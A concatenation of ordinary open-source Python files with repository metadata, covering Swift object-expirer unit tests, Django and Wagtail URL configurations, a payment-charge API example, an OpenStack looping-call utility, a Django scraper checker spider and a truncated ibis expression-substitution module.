def test_run_once_nothing_to_do(self):
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = 'throw error because a string does not have needed methods'
x.run_once()
self.assertEqual(x.logger.log_dict['exception'],
[(("Unhandled exception",), {},
"'str' object has no attribute "
"'get_account_info'")])
def test_run_once_calls_report(self):
class InternalClient(object):
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return []
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient()
x.run_once()
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
def test_container_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def iter_objects(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient([{'name': str(int(time() + 86400))}])
x.run_once()
for exccall in x.logger.log_dict['exception']:
self.assertTrue(
'This should not have been called' not in exccall[0][0])
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient([{'name': str(int(time() - 86400))}])
x.run_once()
self.assertEqual(
x.logger.log_dict['exception'],
[(('Unhandled exception',), {},
str(Exception('This should not have been called')))])
def test_object_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def should_not_be_called(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() + 86400)}])
x.run_once()
for exccall in x.logger.log_dict['exception']:
self.assertTrue(
'This should not have been called' not in exccall[0][0])
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
ts = int(time() - 86400)
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.delete_actual_object = should_not_be_called
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(
excswhiledeleting,
['Exception while deleting object %d %d-actual-obj '
'This should not have been called' % (ts, ts)])
def test_failed_delete_keeps_entry(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
raise Exception('This should not have been called')
def iter_objects(self, *a, **kw):
return self.objects
def deliberately_blow_up(actual_obj, timestamp):
raise Exception('failed to delete actual object')
def should_not_get_called(container, obj):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.iter_containers = lambda: [str(int(time() - 86400))]
ts = int(time() - 86400)
x.delete_actual_object = deliberately_blow_up
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(
excswhiledeleting,
['Exception while deleting object %d %d-actual-obj '
'failed to delete actual object' % (ts, ts)])
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
ts = int(time() - 86400)
x.delete_actual_object = lambda o, t: None
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(
excswhiledeleting,
['Exception while deleting object %d %d-actual-obj This should '
'not have been called' % (ts, ts)])
def test_success_gets_counted(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.delete_actual_object = lambda o, t: None
self.assertEqual(x.report_objects, 0)
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() - 86400)}])
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 1 objects expired',), {})])
def test_delete_actual_object_does_not_get_unicode(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
got_unicode = [False]
def delete_actual_object_test_for_unicode(actual_obj, timestamp):
if isinstance(actual_obj, unicode):
got_unicode[0] = True
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.delete_actual_object = delete_actual_object_test_for_unicode
self.assertEqual(x.report_objects, 0)
x.swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': u'%d-actual-obj' % int(time() - 86400)}])
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 1 objects expired',), {})])
self.assertFalse(got_unicode[0])
def test_failed_delete_continues_on(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
raise Exception('failed to delete container')
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def fail_delete_actual_object(actual_obj, timestamp):
raise Exception('failed to delete actual object')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
cts = int(time() - 86400)
ots = int(time() - 86400)
containers = [
{'name': str(cts)},
{'name': str(cts + 1)},
]
objects = [
{'name': '%d-actual-obj' % ots},
{'name': '%d-next-obj' % ots}
]
x.swift = InternalClient(containers, objects)
x.delete_actual_object = fail_delete_actual_object
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(sorted(excswhiledeleting), sorted([
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object' % (cts, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object' % (cts, ots),
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object' % (cts + 1, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object' % (cts + 1, ots),
'Exception while deleting container %d failed to delete '
'container' % (cts,),
'Exception while deleting container %d failed to delete '
'container' % (cts + 1,)]))
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
def test_run_forever_initial_sleep_random(self):
global last_not_sleep
def raise_system_exit():
raise SystemExit('test_run_forever')
interval = 1234
x = expirer.ObjectExpirer({'__file__': 'unit_test',
'interval': interval})
orig_random = expirer.random
orig_sleep = expirer.sleep
try:
expirer.random = not_random
expirer.sleep = not_sleep
x.run_once = raise_system_exit
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.random = orig_random
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'test_run_forever')
self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
raises = [0]
def raise_exceptions():
raises[0] += 1
if raises[0] < 2:
raise Exception('exception %d' % raises[0])
raise SystemExit('exiting exception %d' % raises[0])
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
orig_sleep = expirer.sleep
try:
expirer.sleep = not_sleep
x.run_once = raise_exceptions
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'exiting exception 2')
self.assertEqual(x.logger.log_dict['exception'],
[(('Unhandled exception',), {},
'exception 1')])
def test_delete_actual_object(self):
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
def test_delete_actual_object_nourlquoting(self):
# delete_actual_object should not do its own url quoting because
# internal client's make_request handles that.
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object name', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_handles_404(self):
def fake_app(env, start_response):
start_response('404 Not Found', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
x.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_handles_412(self):
def fake_app(env, start_response):
start_response('412 Precondition Failed',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
x.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
def fake_app(env, start_response):
start_response(
'503 Internal Server Error',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
exc = None
try:
x.delete_actual_object('/path/to/object', '1234')
except Exception as err:
exc = err
finally:
pass
self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
name = 'this name should get quoted'
timestamp = '1366063156.863045'
x = expirer.ObjectExpirer({})
x.swift.make_request = mock.MagicMock()
x.delete_actual_object(name, timestamp)
x.swift.make_request.assert_called_once()
self.assertEqual(x.swift.make_request.call_args[0][1],
'/v1/' + urllib.quote(name))
if __name__ == '__main__':
main()
| {
"content_hash": "0c9b4d9c8ed9e1371bde23a596e68b65",
"timestamp": "",
"source": "github",
"line_count": 686,
"max_line_length": 79,
"avg_line_length": 34.72886297376093,
"alnum_prop": 0.5393720617864338,
"repo_name": "lielongxingkong/windchimes",
"id": "493de0ff2455e2944f449080b9d3425311670475",
"size": "24414",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "test/unit/obj/test_expirer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "15048"
},
{
"name": "Python",
"bytes": "3535857"
},
{
"name": "Shell",
"bytes": "5547"
}
],
"symlink_target": ""
} |
from django.conf.urls import include, url
from django.conf import settings
from django.contrib import admin
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
from wagtail.wagtailcore import urls as wagtail_urls
urlpatterns = [
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^search/$', '{{ cookiecutter.repo_name }}.search.views.search', name='search'),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic import TemplateView
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Add views for testing 404 and 500 templates
urlpatterns += [
url(r'^test404/$', TemplateView.as_view(template_name='404.html')),
url(r'^test500/$', TemplateView.as_view(template_name='500.html')),
]
urlpatterns += [
url(r'', include(wagtail_urls)),
]
| {
"content_hash": "e99bb67ef170abe541d1847fbc84aa80",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 89,
"avg_line_length": 31.025641025641026,
"alnum_prop": 0.7206611570247934,
"repo_name": "RocketPod/wagtail-cookiecutter",
"id": "2c5850b2b058ad04f53e509a6f4f8f62d6093719",
"size": "1210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5120"
},
{
"name": "CSS",
"bytes": "414"
},
{
"name": "HTML",
"bytes": "4530"
},
{
"name": "Makefile",
"bytes": "5612"
},
{
"name": "Python",
"bytes": "25024"
},
{
"name": "Ruby",
"bytes": "1225"
}
],
"symlink_target": ""
} |
"""backend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'profiles', views.ProfileViewSet, base_name='profiles')
urlpatterns = [
url(r'^', include(router.urls)),
]
| {
"content_hash": "2c4d23afa08dd19fb872d2d54ae24033",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 79,
"avg_line_length": 34.65384615384615,
"alnum_prop": 0.7114317425083241,
"repo_name": "stphivos/django-angular2-fullstack-devops",
"id": "8b58d4bf4069ce4dfab3bf5882e0904d24439a4a",
"size": "901",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "backend/api/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1959"
},
{
"name": "HCL",
"bytes": "17373"
},
{
"name": "HTML",
"bytes": "3640"
},
{
"name": "JavaScript",
"bytes": "7882"
},
{
"name": "Python",
"bytes": "15835"
},
{
"name": "Shell",
"bytes": "17894"
},
{
"name": "TypeScript",
"bytes": "62594"
}
],
"symlink_target": ""
} |
from gerencianet import Gerencianet
from ...credentials import credentials
gn = Gerencianet(credentials.CREDENTIALS)
body = {
'items': [{
'name': "Product 1",
'value': 1100,
'amount': 2
}],
'shippings': [{
'name': "Default Shipping Cost",
'value': 100
}]
}
response = gn.create_charge(body=body)
print(response)
| {
"content_hash": "f70cac1c786bfb27b4d6160c6b2af2f4",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 41,
"avg_line_length": 18.65,
"alnum_prop": 0.5871313672922251,
"repo_name": "gerencianet/gn-api-sdk-python",
"id": "53b40aed4d829a9a24224d0b5f3e430655b90f44",
"size": "392",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/default/charge/create_charge.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25401"
}
],
"symlink_target": ""
} |
import sys
from eventlet import event
from eventlet import greenthread
from dragon.openstack.common.gettextutils import _ # noqa
from dragon.openstack.common import log as logging
from dragon.openstack.common import timeutils
LOG = logging.getLogger(__name__)
class LoopingCallDone(Exception):
"""Exception to break out and stop a LoopingCall.
The poll-function passed to LoopingCall can raise this exception to
break out of the loop normally. This is somewhat analogous to
StopIteration.
An optional return-value can be included as the argument to the exception;
this return-value will be returned by LoopingCall.wait()
"""
def __init__(self, retvalue=True):
""":param retvalue: Value that LoopingCall.wait() should return."""
self.retvalue = retvalue
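# Usage sketch (not part of the original module): a poll function stops a
# FixedIntervalLoopingCall (defined below) by raising LoopingCallDone, and the
# optional retvalue comes back from wait(). The poll function and its condition
# are hypothetical.
#
#     def _poll():
#         if work_is_finished():            # hypothetical condition
#             raise LoopingCallDone(retvalue='done')
#
#     timer = FixedIntervalLoopingCall(_poll)
#     timer.start(interval=5, initial_delay=2)
#     result = timer.wait()                 # returns 'done' once the loop stops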
class LoopingCallBase(object):
def __init__(self, f=None, *args, **kw):
self.args = args
self.kw = kw
self.f = f
self._running = False
self.done = None
def stop(self):
self._running = False
def wait(self):
return self.done.wait()
class FixedIntervalLoopingCall(LoopingCallBase):
"""A fixed interval looping call."""
def start(self, interval, initial_delay=None):
self._running = True
done = event.Event()
def _inner():
if initial_delay:
greenthread.sleep(initial_delay)
try:
while self._running:
start = timeutils.utcnow()
self.f(*self.args, **self.kw)
end = timeutils.utcnow()
if not self._running:
break
delay = interval - timeutils.delta_seconds(start, end)
if delay <= 0:
LOG.warn(_('task run outlasted interval by %s sec') %
-delay)
greenthread.sleep(delay if delay > 0 else 0)
except LoopingCallDone as e:
self.stop()
done.send(e.retvalue)
except Exception:
LOG.exception(_('in fixed duration looping call'))
done.send_exception(*sys.exc_info())
return
else:
done.send(True)
self.done = done
greenthread.spawn_n(_inner)
return self.done
# TODO(mikal): this class name is deprecated in Havana and should be removed
# in the I release
LoopingCall = FixedIntervalLoopingCall
class DynamicLoopingCall(LoopingCallBase):
"""A looping call which sleeps until the next known event.
The function called should return how long to sleep for before being
called again.
"""
def start(self, initial_delay=None, periodic_interval_max=None):
self._running = True
done = event.Event()
def _inner():
if initial_delay:
greenthread.sleep(initial_delay)
try:
while self._running:
idle = self.f(*self.args, **self.kw)
if not self._running:
break
if periodic_interval_max is not None:
idle = min(idle, periodic_interval_max)
LOG.debug(_('Dynamic looping call sleeping for %.02f '
'seconds'), idle)
greenthread.sleep(idle)
except LoopingCallDone as e:
self.stop()
done.send(e.retvalue)
except Exception:
LOG.exception(_('in dynamic looping call'))
done.send_exception(*sys.exc_info())
return
else:
done.send(True)
self.done = done
greenthread.spawn(_inner)
return self.done
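# Illustrative usage sketch: with DynamicLoopingCall the callable itself
# returns how many seconds to sleep before it is invoked again.
# `run_periodic_tasks` is a hypothetical example callable.
#
#     def run_periodic_tasks():
#         ...  # do some work
#         return 30  # ask to be called again in roughly 30 seconds
#
#     DynamicLoopingCall(run_periodic_tasks).start(periodic_interval_max=60)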
| {
"content_hash": "42fe69d369b83ec709abdc23d877f8da",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 78,
"avg_line_length": 30.140625,
"alnum_prop": 0.5544323483670296,
"repo_name": "os-cloud-storage/openstack-workload-disaster-recovery",
"id": "9c51513246b8179fb4332d3a8676103328ce93cb",
"size": "4673",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dragon/openstack/common/loopingcall.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4930"
},
{
"name": "Python",
"bytes": "758400"
},
{
"name": "Shell",
"bytes": "24692"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from builtins import str
import datetime, json, logging, os
from jsonpath_rw import jsonpath, parse
from jsonpath_rw.lexer import JsonPathLexerError
from scrapy import signals
from scrapy.exceptions import CloseSpider
from scrapy.http import Request, FormRequest
from pydispatch import dispatcher
from dynamic_scraper.spiders.django_base_spider import DjangoBaseSpider
from dynamic_scraper.models import ScraperElem
from dynamic_scraper.utils.scheduler import Scheduler
class DjangoChecker(DjangoBaseSpider):
name = "django_checker"
mandatory_vars = ['ref_object', 'scraper',]
def __init__(self, *args, **kwargs):
        super(DjangoChecker, self).__init__(*args, **kwargs)
@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
spider = cls(*args, **kwargs)
spider._set_crawler(crawler)
spider._set_config(**kwargs)
spider._check_checker_config()
spider._set_request_kwargs()
spider._set_meta_splash_args()
spider.scheduler = Scheduler(spider.scraper.scraped_obj_class.checker_scheduler_conf)
dispatcher.connect(spider.response_received, signal=signals.response_received)
msg = "Checker for " + spider.ref_object.__class__.__name__ + " \"" + str(spider.ref_object) + "\" (" + str(spider.ref_object.pk) + ") initialized."
spider.log(msg, logging.INFO)
return spider
def output_usage_help(self):
out = (
'',
'DDS Usage',
'=========',
' scrapy crawl [scrapy_options] CHECKERNAME -a id=REF_OBJECT_ID [dds_options]',
'',
'Options',
'-------',
'-a do_action=(yes|no) Delete on checker success, default: no (Test Mode)',
'-L LOG_LEVEL (scrapy option) Setting the log level for both Scrapy and DDS',
'-a run_type=(TASK|SHELL) Simulate task based checker run, default: SHELL',
'-a output_response_body=(yes|no) Output response body content for debugging',
'',
)
for out_str in out:
self.dds_logger.info(out_str)
def _set_config(self, **kwargs):
log_msg = ""
#output_response_body
if 'output_response_body' in kwargs and kwargs['output_response_body'] == 'yes':
self.conf['OUTPUT_RESPONSE_BODY'] = True
if len(log_msg) > 0:
log_msg += ", "
log_msg += "output_response_body " + str(self.conf['OUTPUT_RESPONSE_BODY'])
else:
self.conf['OUTPUT_RESPONSE_BODY'] = False
super(DjangoChecker, self)._set_config(log_msg, **kwargs)
def _check_checker_config(self):
if self.scraper.checker_set.count() == 0:
msg = '{cs}No checkers defined for scraper.{ce}'.format(
cs=self.bcolors["INFO"], ce=self.bcolors["ENDC"])
self.dds_logger.warning(msg)
self.output_usage_help()
raise CloseSpider(msg)
def _del_ref_object(self):
if self.action_successful:
self.log("Item already deleted, skipping.", logging.INFO)
return
from scrapy.utils.project import get_project_settings
settings = get_project_settings()
try:
img_elem = self.scraper.get_image_elem()
if hasattr(self.ref_object, img_elem.scraped_obj_attr.name):
img_name = getattr(self.ref_object, img_elem.scraped_obj_attr.name)
thumb_paths = []
if settings.get('IMAGES_THUMBS') and len(settings.get('IMAGES_THUMBS')) > 0:
for key in settings.get('IMAGES_THUMBS').keys():
thumb_paths.append(('thumbnail, {k}'.format(k=key), os.path.join(settings.get('IMAGES_STORE'), 'thumbs', key, img_name),))
del_paths = []
if self.conf['IMAGES_STORE_FORMAT'] == 'FLAT':
del_paths.append(('original, flat path', os.path.join(settings.get('IMAGES_STORE'), img_name),))
if self.conf['IMAGES_STORE_FORMAT'] == 'ALL':
del_paths.append(('original, full/ path', os.path.join(settings.get('IMAGES_STORE'), 'full' , img_name),))
del_paths += thumb_paths
if self.conf['IMAGES_STORE_FORMAT'] == 'THUMBS':
del_paths += thumb_paths
for path in del_paths:
if os.access(path[1], os.F_OK):
try:
os.unlink(path[1])
self.log("Associated image ({n}, {p}) deleted.".format(n=img_name, p=path[0]), logging.INFO)
except Exception:
self.log("Associated image ({n}, {p}) could not be deleted!".format(n=img_name, p=path[0]), logging.ERROR)
else:
self.log("Associated image ({n}, {p}) could not be found!".format(n=img_name, p=path[0]), logging.WARNING)
except ScraperElem.DoesNotExist:
pass
self.ref_object.delete()
self.scraper.last_checker_delete = datetime.datetime.now()
self.scraper.save()
self.action_successful = True
self.log("{cs}Item deleted.{ce}".format(
cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
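    # Illustrative sketch of the Scrapy image settings the cleanup above
    # relies on (example values only, not part of this project):
    #
    #     IMAGES_STORE = '/path/to/images'
    #     IMAGES_THUMBS = {'small': (50, 50), 'medium': (100, 100)}
    #
    # With the DDS setting IMAGES_STORE_FORMAT='ALL', originals live under
    # IMAGES_STORE/full/ and thumbnails under IMAGES_STORE/thumbs/<key>/;
    # 'FLAT' keeps originals directly in IMAGES_STORE, 'THUMBS' keeps
    # thumbnails only.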
def start_requests(self):
for checker in self.scraper.checker_set.all():
url = getattr(self.ref_object, checker.scraped_obj_attr.name)
rpt = self.scraper.get_rpt_for_scraped_obj_attr(checker.scraped_obj_attr)
kwargs = self.dp_request_kwargs[rpt.page_type].copy()
if 'meta' not in kwargs:
kwargs['meta'] = {}
kwargs['meta']['checker'] = checker
kwargs['meta']['rpt'] = rpt
self._set_meta_splash_args()
if url:
if rpt.request_type == 'R':
yield Request(url, callback=self.parse, method=rpt.method, dont_filter=True, **kwargs)
else:
yield FormRequest(url, callback=self.parse, method=rpt.method, formdata=self.dp_form_data[rpt.page_type], dont_filter=True, **kwargs)
def response_received(self, **kwargs):
checker = kwargs['response'].request.meta['checker']
rpt = kwargs['response'].request.meta['rpt']
# 404 test
if kwargs['response'].status == 404:
if self.scheduler_runtime.num_zero_actions == 0:
self.log("{cs}Checker test returned second 404 ({c}). Delete reason.{ce}".format(
c=str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self._del_ref_object()
else:
self.log("{cs}Checker test returned first 404 ({c}).{ce}".format(
                    c=str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
self.action_successful = True
def parse(self, response):
# x_path test
checker = response.request.meta['checker']
rpt = response.request.meta['rpt']
if self.conf['OUTPUT_RESPONSE_BODY']:
self.log("Response body ({url})\n\n***** RP_START *****\n{resp_body}\n***** RP_END *****\n\n".format(
url=response.url,
resp_body=response.body.decode('utf-8')), logging.INFO)
if checker.checker_type == '4':
self.log("{cs}No 404 result ({c} checker type).{ce}".format(
c=str(checker), cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self.dds_logger.info("{cs}Item kept.{ce}".format(
cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]))
return
if rpt.content_type == 'J':
json_resp = json.loads(response.body_as_unicode())
try:
jsonpath_expr = parse(checker.checker_x_path)
except JsonPathLexerError:
msg = "Invalid checker JSONPath ({c})!".format(c=str(checker))
self.dds_logger.error(msg)
raise CloseSpider()
test_select = [match.value for match in jsonpath_expr.find(json_resp)]
#self.log(unicode(test_select), logging.INFO)
else:
try:
test_select = response.xpath(checker.checker_x_path).extract()
except ValueError:
self.log("Invalid checker XPath ({c})!".format(c=str(checker)), logging.ERROR)
return
if len(test_select) > 0 and checker.checker_x_path_result == '':
self.log("{cs}Elements for XPath found on page (no result string defined) ({c}). Delete reason.{ce}".format(
c=str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self._del_ref_object()
return
elif len(test_select) > 0 and test_select[0] == checker.checker_x_path_result:
self.log("{cs}XPath result string '{s}' found on page ({c}). Delete reason.{ce}".format(
s=checker.checker_x_path_result, c=str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self._del_ref_object()
return
else:
self.log("{cs}XPath result string not found ({c}).{ce}".format(
c=str(checker), cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self.dds_logger.info("{cs}Item kept.{ce}".format(
cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]))
return
| {
"content_hash": "84cf62b267962fd57d228f649a21f91a",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 156,
"avg_line_length": 45.03603603603604,
"alnum_prop": 0.5524104820964193,
"repo_name": "holgerd77/django-dynamic-scraper",
"id": "f86de816984df8ef01b153d4020d9ce3092c40f6",
"size": "10025",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dynamic_scraper/spiders/django_checker.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9012"
},
{
"name": "JavaScript",
"bytes": "1698"
},
{
"name": "Python",
"bytes": "312719"
},
{
"name": "Shell",
"bytes": "6984"
}
],
"symlink_target": ""
} |
from ibis.common import RelationError, ExpressionError
from ibis.expr.window import window
import ibis.expr.types as ir
import ibis.expr.operations as ops
import ibis.util as util
# ---------------------------------------------------------------------
# Some expression metaprogramming / graph transformations to support
# compilation later
def sub_for(expr, substitutions):
helper = _Substitutor(expr, substitutions)
return helper.get_result()
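# Illustrative sketch (hypothetical expressions): substitute one table
# expression for another throughout a predicate, e.g. to re-express a
# predicate written against a derived table in terms of its parent table:
#
#     # rewritten = sub_for(pred, [(derived_table, parent_table)])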
class _Substitutor(object):
def __init__(self, expr, substitutions, sub_memo=None):
self.expr = expr
self.substitutions = substitutions
self._id_to_expr = {}
for k, v in substitutions:
self._id_to_expr[self._key(k)] = v
self.sub_memo = sub_memo or {}
self.unchanged = True
def get_result(self):
expr = self.expr
node = expr.op()
if getattr(node, 'blocking', False):
return expr
subbed_args = []
for arg in node.args:
if isinstance(arg, (tuple, list)):
subbed_arg = [self._sub_arg(x) for x in arg]
else:
subbed_arg = self._sub_arg(arg)
subbed_args.append(subbed_arg)
# Do not modify unnecessarily
if self.unchanged:
return expr
subbed_node = type(node)(*subbed_args)
if isinstance(expr, ir.ValueExpr):
result = expr._factory(subbed_node, name=expr._name)
else:
result = expr._factory(subbed_node)
return result
def _sub_arg(self, arg):
if isinstance(arg, ir.Expr):
subbed_arg = self.sub(arg)
if subbed_arg is not arg:
self.unchanged = False
else:
# a string or some other thing
subbed_arg = arg
return subbed_arg
def _key(self, expr):
return repr(expr.op())
def sub(self, expr):
key = self._key(expr)
if key in self.sub_memo:
return self.sub_memo[key]
if key in self._id_to_expr:
return self._id_to_expr[key]
result = self._sub(expr)
self.sub_memo[key] = result
return result
def _sub(self, expr):
